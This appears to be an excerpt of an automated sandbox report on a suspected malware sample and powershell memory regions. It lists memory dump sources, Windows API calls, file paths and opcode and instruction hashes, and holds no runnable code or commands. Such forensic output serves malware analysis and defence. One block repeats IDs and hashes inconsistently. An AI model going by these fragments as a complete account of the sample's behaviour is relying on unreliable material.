                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                      • String ID: : Completed
                                                                                                                                                                                      • API String ID: 3356406503-2954849223
                                                                                                                                                                                      • Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                                                                                                                      • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 1100898210-3936084776
                                                                                                                                                                                      • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                                                      • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\av8XPPpdBc.exe,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 00405E78
                                                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\av8XPPpdBc.exe,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 00405E88
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                      • API String ID: 2709904686-3125694417
                                                                                                                                                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                      • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 087d3ec00507efdf7c31e956ae56fcb9155700e02342508a6724ad34a88e8f7e
                                                                                                                                                                                      • Instruction ID: 05ffee395092fcc01e7784705fac3b7e7154491c3749faced4ce83c2d2cc523a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 087d3ec00507efdf7c31e956ae56fcb9155700e02342508a6724ad34a88e8f7e
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3022B75A05219DFDB15CFA8D884AAEBBB2FF88314F248159E805AB361D731ED41CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1b935c9bf104ad5c2f2504eb6ddd9164ff89114d5c025370cd57ef58521b4cab
                                                                                                                                                                                      • Instruction ID: 15dc210c90606ab77223c794a8738edc0c94631ab0af9ec463f783d6262d1372
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b935c9bf104ad5c2f2504eb6ddd9164ff89114d5c025370cd57ef58521b4cab
                                                                                                                                                                                      • Instruction Fuzzy Hash: BB021C35A01209DFDB15CF98D894AAEBBB2FF89310F248159E915AB365C731ED41CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 08b35a9824eaf7b7301693048ee85ba2c7e0a0357a860d4ea4c85f78ee3ed908
                                                                                                                                                                                      • Instruction ID: 377c88ad1c402763859a02ee36468f43ec74e13a9442cb1dd564f9217f32b4e1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b35a9824eaf7b7301693048ee85ba2c7e0a0357a860d4ea4c85f78ee3ed908
                                                                                                                                                                                      • Instruction Fuzzy Hash: 51021C74A01219DFDB15CF98C494AAEBBB2FF88310F248159E915AB365C731ED92CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3e7ce1f0b7f6c5f18b37cc522ede1a24a60aab2eab9c51ed1c638565b2a058ef
                                                                                                                                                                                      • Instruction ID: 95fc63a35690d9959c4d10db23c29f47bd4f78fc2fcbf98285a839c3430b728b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e7ce1f0b7f6c5f18b37cc522ede1a24a60aab2eab9c51ed1c638565b2a058ef
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7702E775A05219DFDB15CFA8C494AAEBBB2FF88310F248159E845AB361D731ED81CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f032edfd95a5e78a8e9741919a9ffe30346cdf29e40b7ad95afafb66e7b410ce
                                                                                                                                                                                      • Instruction ID: 191fafa262544f9b4baf447bb0980bf14838bbba6ffd28f347409e4972082d77
                                                                                                                                                                                      • Opcode Fuzzy Hash: f032edfd95a5e78a8e9741919a9ffe30346cdf29e40b7ad95afafb66e7b410ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF16DB4A01285AFDB14CFA4C444FA9BBB2EF89714F54C059E906AB355CB72ED42CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 50624fdd64b70450faa4849f4b3d895ccad8f21ab0cc185c45c0d14d0bc38a9a
                                                                                                                                                                                      • Instruction ID: d58958a363482d06c1284e24aa968da204febbb6fa3f75c690f420031b97dedb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 50624fdd64b70450faa4849f4b3d895ccad8f21ab0cc185c45c0d14d0bc38a9a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E1F875A01209EFDB19CF98D594AADBBB2FF89314F248159E805AB361C731ED81CF90
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e5208bedc408a9b6008d7708a9a9294c46ddc32f1b1fa9c6cd27decb8f3f0473
                                                                                                                                                                                      • Instruction ID: ab996246a4086c49b10accec3d09bea166a6407e37252fdf404bdee541e590fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: e5208bedc408a9b6008d7708a9a9294c46ddc32f1b1fa9c6cd27decb8f3f0473
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1E171B4A10215DFDB24CB64C854BEABBB2BF8A310F508199D5496F741CB72ED81CFA1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7d318f5c37210919f3d533453c114dc2416002fc557509a2a38d24cbd39936d8
                                                                                                                                                                                      • Instruction ID: 55db1622d18e94e46f1ea393c9f50104ea8a9e9d2f22813613a353b64e1c86da
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d318f5c37210919f3d533453c114dc2416002fc557509a2a38d24cbd39936d8
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B18DB4A00205DFDB14CFA8C454BAEBBB2AF89718F65C059D9066F355CB71EC82CB91
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530563707.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93b0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ad9055e1cf171b21f7399419ae2a648212208534de91c3095039c9a5755d8eb7
                                                                                                                                                                                      • Instruction ID: 4132c133cc40602097d61f8ca72ca4d1dd926f24d39facae2738405e8338126a
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad9055e1cf171b21f7399419ae2a648212208534de91c3095039c9a5755d8eb7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A912E74A00214DFDB18CF94C455AAEBBB2AF89314F158069EA09AFB55CB72DC81CF61
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0b1f25fdc0603332d424d8b77c4359364eec8b314a6ae102b2fe274f3fb8da2a
                                                                                                                                                                                      • Instruction ID: a985f972f9b5efde83cba45c708ff2a69adf3531d3db8cf1364c0dcd61c30d90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b1f25fdc0603332d424d8b77c4359364eec8b314a6ae102b2fe274f3fb8da2a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A7126F1700347DFCB109F7984052BABBA1AF85250F54847AD956DB781DB31D942CBA1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 88b22df1a34dc6131bb93bfbfd92c5a5647e93e7814d7d8e26345b286b900eac
                                                                                                                                                                                      • Instruction ID: 195325652165c6017b49c5cf80c86246c15ee4b8fffef28117a341cf50bc8fae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 88b22df1a34dc6131bb93bfbfd92c5a5647e93e7814d7d8e26345b286b900eac
                                                                                                                                                                                      • Instruction ID: d4e8cdd270ba3bfe1a89ad7636c7c04f6a7406e47d7f794402f185c29e63bbf8
                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d47349f73d78935ca73ff700bf0d2b1550ec7f48c39f094fd26a83452e1dbf
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF216BB0A043429FCB109F7484093757FA19F85350F4840AAD946DFB92DB36D9C1CBA2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530563707.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93b0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 95c632e25875085720a8b9ce39afa43b9c1ae046a353788613c7e65a69992ec1
                                                                                                                                                                                      • Instruction ID: 9846645a9d0c462d55202d1e4b965b844af8c439400f8d3360379e228ca81de1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 95c632e25875085720a8b9ce39afa43b9c1ae046a353788613c7e65a69992ec1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68218E32B041098FDB6999A4E8511EFF7A5BBE9210F10827FC771CF982CA32C416CB52
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 04d655a6847223ea20a3ae989107fb2571b9b43e945b85a61f2bfb042ced7ab6
                                                                                                                                                                                      • Instruction ID: 202401192efa90451bd8d123b8277117bf5362316641ad0cae056d89840d6210
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04d655a6847223ea20a3ae989107fb2571b9b43e945b85a61f2bfb042ced7ab6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 31F02E31E041499FDB10E799E8449EEBB74FF41360F5080E9D4049B751D7345C05CFA1